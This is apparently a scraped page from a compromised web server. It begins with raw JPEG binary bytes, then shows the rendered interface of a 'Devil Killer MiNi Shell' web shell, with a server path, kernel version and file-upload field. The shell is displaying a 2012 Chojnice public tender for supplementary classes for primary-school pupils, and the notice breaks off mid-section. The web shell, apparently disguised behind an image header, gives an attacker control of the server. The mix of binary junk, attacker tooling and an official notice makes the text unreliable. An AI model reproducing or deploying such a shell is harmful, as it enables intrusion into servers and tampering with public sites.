JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120220/50220-N-2012.html

<p class="kh_header"><b>Chojnice: Zakup usług edukacyjnych w ramach projektu systemowego pn. Nauka jest dla wszystkich</b><br>
<b>Numer ogłoszenia: 50220 - 2012; data zamieszczenia: 20.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Stary Rynek 1, 89-600 Chojnice, woj. pomorskie, tel. 052 3971800, faks 052 3972194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastochojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych w ramach projektu systemowego pn. Nauka jest dla wszystkich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu przez nauczycieli zajęć dodatkowych dla dzieci z klas I-III szkół podstawowych, prowadzonych przez Gminę Miejską Chojnice współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Zakres, ilość i rodzaj zajęć w poszczególnych szkołach oraz dni tygodnia w których zajęć określają szczegółowe zadania stanowiące części zamówienia. Przedmiot zamówienia obejmuje następujące części:

Szkoła Podstawowa Nr 1 w Chojnicach:

Zadanie Nr 1 - zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji
część 1 -  grupa 1 i 2 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone w poniedziałki i środy
część 2 -  grupa 3 i 4 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone w poniedziałki i wtorki
część 3 -  grupa 5 i 6 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  10 uczniów, zajęcia prowadzone w środy i czwartki
część 4 -  grupa 7 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki

Zadanie Nr 2 -  zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
część 5 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 6 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy

Zadanie Nr 3 - zajęcia socjoterapeutyczne i psychoedukacyjne.
część 7 -  grupa 1, 2 i 3 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  15  uczniów, zajęcia prowadzone we wtorki i czwartki
część 8 -  grupa 4 i 5  - po 30 godz. na każdą grupę, łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone w poniedziałki i środy
część 9 -  grupa 6 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki

Zadanie Nr 4 - gimnastyka korekcyjna dzieci z wadami postawy. 
część 10 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 11 -  grupa 2 i 3 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone we wtorki i środy
część 12 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 13 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 14 -  grupa 6 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki

Zadanie Nr 5 - Specjalistyczne zajęcia terapeutyczne - muzykoterapia dla dzieci niepełnosprawnych. 
część 15 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki
część 16 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki

Zadanie Nr 6 - Specjalistyczne zajęcia terapeutyczne - arteterapia, terapia pedagogiczna, gimnastyka rehabilitacyjna.
część 17 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki
część 18 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 19 -  grupa 3 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki

Zadanie Nr 7 - Zajęcia rozwijające uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych.
część 20 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki
część 21 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 22 -  grupa 3 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 23 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki

Zadanie Nr 8 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - zajęcia artystyczne. 
część 24 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 25 -  grupa 2, 3, 4, 5 i 6  - po 30 godz. na każdą grupę, łącznie 150 godz.  dla  25  uczniów, zajęcia prowadzone we wtorki, czwartki i piątki
część 26 -  grupa 7, 8, 9 i 10 - po 30 godz. na każdą grupę, łącznie 120 godz. dla 20 uczniów, zajęcia prowadzone we wtorki, środy, czwartki i piątki

Zadanie Nr 9 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - nauka języka angielskiego.
część 27 -  grupa 1, 2 i 3 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  15  uczniów, zajęcia prowadzone we wtorki, środy i czwartki
część 28 -  grupa 4, 5 i 6 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  15  uczniów, zajęcia prowadzone w poniedziałki, wtorki i środy
część 29 -  grupa 7, 8 i 9  - po 30 godz. na każdą grupę, łącznie 90 godz. dla  15  uczniów, zajęcia prowadzone w środy i czwartki
część 30 -  grupa 10 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy

Szkoła Podstawowa Nr 3 w Chojnicach:

Zadanie Nr 10 - zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
część 31 -  grupa 1 - 30 godz. dla  6  uczniów, zajęcia prowadzone w piątki 
część 32 -  grupa 2 - 30 godz. dla  7 uczniów, zajęcia prowadzone we wtorki
część 33 -  grupa 3 - 30 godz. dla  3  uczniów, zajęcia prowadzone w piątki
część 34 -  grupa 4 - 30 godz. dla  7  uczniów, zajęcia prowadzone w czwartki
część 35 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 36 -  grupa 6 - 30 godz. dla  6  uczniów, zajęcia prowadzone w poniedziałki
część 37 -  grupa 7 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 38 -  grupa 8 - 30 godz. dla  6  uczniów, zajęcia prowadzone w piątki
część 39 -  grupa 9 - 30 godz. dla  8  uczniów, zajęcia prowadzone w piątki
część 40 -  grupa 10 - 30 godz. dla  6  uczniów, zajęcia prowadzone w poniedziałki

Zadanie Nr 11 -  zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
część 41 -  grupa 1 - 30 godz. dla  6  uczniów, zajęcia prowadzone w środy
część 42 -  grupa 2 - 30 godz. dla  6  uczniów, zajęcia prowadzone w czwartki
część 43 -  grupa 3 - 30 godz. dla  7  uczniów, zajęcia prowadzone w czwartki
część 44 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 45 -  grupa 5 - 30 godz. dla  4  uczniów, zajęcia prowadzone w środy
część 46 -  grupa 6 - 30 godz. dla  6  uczniów, zajęcia prowadzone w środy
część 47 -  grupa 7 - 30 godz. dla  8  uczniów, zajęcia prowadzone w środy
część 48 -  grupa 8 - 30 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki
część 49 -  grupa 9 - 30 godz. dla  6  uczniów, zajęcia prowadzone w piątki
część 50 -  grupa 10 - 30 godz. dla  7  uczniów, zajęcia prowadzone w czwartki

Zadanie Nr 12 - zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
część 51 -  grupa 1, 2 i 3 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  12  uczniów, zajęcia prowadzone we wtorki

Zadanie Nr 13 - Zajęcia socjoterapeutyczne i psychoedukacyjne.
część 52 -  grupa 1 i 2 -po 30 godz. na każdą grupę, łącznie 60 godz. dla  16  uczniów, zajęcia prowadzone w czwartki
część 53 -  grupa 3, 4 i 5 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  6  uczniów, zajęcia prowadzone w czwartki

Zadanie Nr 14 - Specjalistyczne zajęcia terapeutyczne - arteterapia, terapia pedagogiczna, gimnastyka rehabilitacyjna.
część 54 -  grupa 1 - 30 godz. dla  6  uczniów, zajęcia prowadzone we wtorki
część 55 -  grupa 2 - 30 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki
część 56 -  grupa 3 - 30 godz. dla  6  uczniów, zajęcia prowadzone we wtorki
część 57 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki
część 58 -  grupa 5, 6 i 7  - po 30 godz. na każdą grupę, łącznie 90 godz. dla  11  uczniów, zajęcia prowadzone we wtorki i środy
część 59 -  grupa 8, 9 i 10 - po 30 godz. na każdą grupę, łącznie 90 godz. dla  4  ucznia, zajęcia prowadzone w poniedziałki, wtorki i środy

Zadanie Nr 15 - Zajęcia rozwijające uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych. 
część 60 -  grupa 1 - 30 godz. dla  8  uczniów, zajęcia prowadzone we wtorki
część 61 -  grupa 2 - 30 godz. dla  8  uczniów, zajęcia prowadzone we wtorki
część 62 -  grupa 3 - 30 godz. dla  8  uczniów, zajęcia prowadzone w czwartki
część 63 -  grupa 4 - 30 godz. dla  8  uczniów, zajęcia prowadzone w piątki
część 64 -  grupa 5 - 30 godz. dla  8  uczniów, zajęcia prowadzone we wtorki
część 65 -  grupa 6 - 30 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki
część 66 -  grupa 7 - 30 godz. dla  7  uczniów, zajęcia prowadzone w środy
część 67 -  grupa 8 - 30 godz. dla  7  uczniów, zajęcia prowadzone we wtorki
część 68 -  grupa 9 - 30 godz. dla  7  uczniów, zajęcia prowadzone we wtorki
część 69 -  grupa 10 - 30 godz. dla  8  uczniów, zajęcia prowadzone w piątki

Szkoła Podstawowa Nr 5 w Chojnicach:

Zadanie Nr 16 - zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji
część 70 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 71 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 72 -  grupa 3 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 73 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 74 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 75 -  grupa 6 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 76 -  grupa 7 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki
część 77 -  grupa 8 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 78 -  grupa 9 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 79 -  grupa 10 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 80 -  grupa 11 - 30 godz. dla  5  uczniów, zajęcia prowadzone w piątki

Zadanie Nr 17 -  zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
część 81 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 82 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 83 -  grupa 3 i 4 - po 30 godz. na każdą grupę łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone w środy i piątki
część 84 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 85 -  grupa 6 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 86 -  grupa 7 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki 
część 87 -  grupa 8 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki

Zadanie Nr 18  - zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
część 88 -  grupa od 1do 14  -po 30 godz. na każdą grupę, łącznie 420 godzin dla  56  uczniów, zajęcia prowadzone od poniedziałku do piątku

Zadanie Nr 19 - Zajęcia socjoterapeutyczne i psychoedukacyjne.
część 89 -  grupa 1, 2, 3 i 4 - po 30 godz. na każdą grupę, łącznie 120 godz. dla  12  uczniów, zajęcia prowadzone w piątki
część 90 -  grupa 5 i 6 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  6  uczniów, zajęcia prowadzone w środy
część 91 -  grupa 7 i 8 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  6  uczniów, zajęcia prowadzone w środy

Zadanie Nr 20 - gimnastyka korekcyjna dzieci z wadami postawy.
część 92 -  grupa 1 i 2 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  7  uczniów, zajęcia prowadzone w poniedziałki i piątki
część 93 -  grupa 3 i 4 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  8  uczniów, zajęcia prowadzone w czwartki i piątki
część 94 -  grupa 5 i 6- 30 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki i środy
część 95 -  grupa 7 i 8 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  8  uczniów, zajęcia prowadzone we wtorki i czwartki
część 96 -  grupa 9 i 10 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  8  uczniów, zajęcia prowadzone w środy i czwartki
część 97 -  grupa 11 i 12 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki i wtorki

Zadanie Nr 21 - Zajęcia rozwijające uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych. 
część 98 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 99 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 100 -  grupa 3 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 101 -  grupa 4 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 102 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 103 -  grupa 6 - 30 godz. dla  5  uczniów, zajęcia prowadzone w środy
część 104 -  grupa 7 - 30 godz. dla  5  uczniów, zajęcia prowadzone we wtorki
część 105 -  grupa 8 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki

Zadanie Nr 22 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - zajęcia artystyczne.
część 106 -  grupa 1 i 2 - po 30 godz. na każdą grupę, łącznie 60 godz. dla  12  uczniów, zajęcia prowadzone w środy
część 107 -  grupa 3 i 4 - po 30 godz. na każą grupę, łącznie 60 godz. dla  12  uczniów, zajęcia prowadzone w poniedziałki i środy
część 108 -  grupa 5 - 30 godz. dla  6  uczniów, zajęcia prowadzone w piątki
część 109 -  grupa 6 - 30 godz. dla  6  uczniów, zajęcia prowadzone w poniedziałki
część 110 -  grupa 7 - 30 godz. dla  6  uczniów, zajęcia prowadzone w piątki

Zadanie Nr 23 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - nauka języka angielskiego.
część 111 -  grupa 1, 2, 3, 4 i 5  - po 30 godz. na każdą grupę łącznie 150 godz. dla  30 uczniów, zajęcia prowadzone w poniedziałki i czwartki
część 112 -  grupa 6 i 7 - po 30 godz. na każdą grupę łącznie 60 godz. dla  12  uczniów, zajęcia prowadzone we wtorki i piątki

Szkoła Podstawowa Nr 7 w Chojnicach:

Zadanie Nr 24 - zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji.
część 113 -  grupa 1 - 30 godz. dla  4  uczniów, zajęcia prowadzone w czwartki
część 114 -  grupa 2 i 3  - po 30 godz. na każą grupę  dla  8  uczniów, zajęcia prowadzone w środy i czwartki
część 115 -  grupa 4 - 30 godz. dla  4  uczniów, zajęcia prowadzone poniedziałki
część 116 -  grupa 5 - 30 godz. dla  4  uczniów, zajęcia prowadzone we wtorki
część 117 -  grupa 6 - 30 godz. dla  4  uczniów, zajęcia prowadzone w poniedziałki
część 118 -  grupa 7 - 30 godz. dla  4  uczniów, zajęcia prowadzone w piątki

Zadanie Nr 25 -  zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.
część 119 -  grupa 1 - 30 godz. dla  4  uczniów, zajęcia prowadzone w środy
część 120 -  grupa 2 - 30 godz. dla  4  uczniów, zajęcia prowadzone w czwartki
część 121 - grupa 3, 4 i 5 -po 30 godz. na każdą grupę, łącznie 90 godz. dla  12  uczniów, zajęcia prowadzone w poniedziałki i środy
część 122 -  grupa 6 - 30 godz. dla  4  uczniów, zajęcia prowadzone we wtorki
część 123 -  grupa 7 - 30 godz. dla  4  uczniów, zajęcia prowadzone w środy 

Zadanie Nr 12 - zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy
część 124 -  grupa 1, 2  i  3 - po 30 godz. na każdą grupę łącznie 90 godz. dla  3  uczniów, zajęcia prowadzone we wtorki i czwartki

Zadanie Nr 27 - Zajęcia socjoterapeutyczne i psychoedukacyjne. 
część 125 -  grupa 1, 2, 3 i 4  - po 30 godz. na każdą grupę łącznie 120 godz. dla  8  uczniów, zajęcia prowadzone w poniedziałki i we wtorki

Zadanie Nr 28 - gimnastyka korekcyjna dzieci z wadami postawy. 
część 126 -  grupa 1, 2 i 3 po 30 godz. na każdą grupę łącznie 90 godz. dla  15 uczniów, zajęcia prowadzone w poniedziałki i wtorki
część 127 -  grupa 4, 5 i 6 -po 30 godz. na każdą grupę łącznie 90 godz.  dla  15 uczniów, zajęcia prowadzone w poniedziałki i czwartki

Zadanie Nr 29 - Zajęcia rozwijające uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych.
część 128 -  grupa 1 - 30 godz. dla  5  uczniów, zajęcia prowadzone w poniedziałki
część 129 -  grupa 2 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki
część 130 -  grupa 3 i 4 - po 30 godz. na grupę łącznie 60 godz. dla  10  uczniów, zajęcia prowadzone we wtorki i środy
część 131 -  grupa 5 - 30 godz. dla  5  uczniów, zajęcia prowadzone w czwartki

Zadanie Nr 30 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - zajęcia artystyczne.
część 132 -  grupa 1, 2 i 3  - po 30 godzin na grupę łącznie 90 godz. dla  15  uczniów, zajęcia prowadzone w czwartki

Zadanie Nr 31 - Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych - nauka języka angielskiego.
część 133 -  grupa 1 - 30 godz. dla  9  uczniów, zajęcia prowadzone w czwartki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 133.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania, Zamawiający wymaga uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. Nr 50, poz. 400). Za spełnienie tego warunku uzna złożenie pisemnego oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają zgodne z ww. rozporządzeniem wymagane uprawnienia, którego wzór stanowi załącznik Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - wykonawca składa wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia. Wzór wykazu stanowi załącznik Nr 6 do SIWZ. Osoby które będą uczestniczyć w wykonywaniu zamówienia tzn. będą prowadziły zajęcia, muszą posiadać kwalifikacje do nauczania w szkole podstawowej zgodne z ww. rozporządzeniem. Do wykazu należy załączyć oświadczenie wykazanych osób, że posiadają wymagane uprawnienia - wzór oświadczenia stanowi załącznik Nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

